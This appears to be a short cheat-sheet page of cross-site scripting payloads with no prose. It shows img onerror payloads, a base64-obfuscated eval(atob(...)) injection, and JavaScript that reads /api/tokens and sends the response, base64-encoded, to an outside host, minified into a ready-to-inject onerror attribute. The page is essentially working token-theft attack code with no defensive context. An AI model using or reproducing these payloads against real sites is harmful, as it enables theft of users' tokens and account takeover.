Skip to content

XSS

example 1

<img src='#' onerror='alert(1)' />

<img src='#' onerror='(function(){alert(1);return false;})();return false;' />
xhttp = new XMLHttpRequest(); 
xhttp.onload = function(){alert(this.responseText)}; xhttp.open('GET','/api/tokens');  
xhttp.send();
eval(atob(".................."));
eval(atob('..................'));
eval(atob(`..................`));
<img src=0 onerror='eval(atob(`eGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgCnhodHRwLm9ubG9hZCA9IGZ1bmN0aW9uKCl7YWxlcnQodGhpcy5yZXNwb25zZVRleHQpfTsgeGh0dHAub3BlbignR0VUJywnL2FwaS90b2tlbnMnKTsgIAp4aHR0cC5zZW5kKCk7`))'/>

example 2

a = new XMLHttpRequest(); 
a.onload = function(){
    b = new XMLHttpRequest();
    b.open('GET','//michalszalkowski.com?'+btoa(this.responseText)); 
    b.send();
}; 
a.open('GET','/api/tokens');
a.setRequestHeader('Hacker', 'Szalek');
a.send();

(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()
<img src=0 onerror='(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()'/>